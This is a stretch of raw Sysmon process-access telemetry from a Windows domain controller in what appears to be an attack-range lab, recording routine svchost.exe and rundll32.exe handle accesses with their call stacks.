13:58:21.336{59A5CD1D-93FB-6005-FE04-00000000A301}5108820C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FD04-00000000A301}1156C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010559Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.336{59A5CD1D-93FB-6005-FE04-00000000A301}51084896C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FD04-00000000A301}1156C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010558Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.321{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010557Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.321{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010556Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.321{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010555Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.321{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010554Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.321{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010553Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.321{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010552Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.321{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010551Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.321{59A5CD1D-8E46-6005-1600-00000000A301}15442108C:\Windows\system32\svchost.exe{59A5CD1D-93FD-6005-FF04-00000000A301}2584C:\Windows\system32\rundll32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010550Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.321{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-93FD-6005-FF04-00000000A301}2584C:\Windows\system32\rundll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010549Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.305{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010548Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.305{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010547Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.305{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010546Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.305{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010545Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.305{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010544Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.305{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010543Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.305{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010542Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.305{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010541Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.305{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010540Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.305{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010539Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.305{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010538Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.305{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010537Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.305{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010536Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.305{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 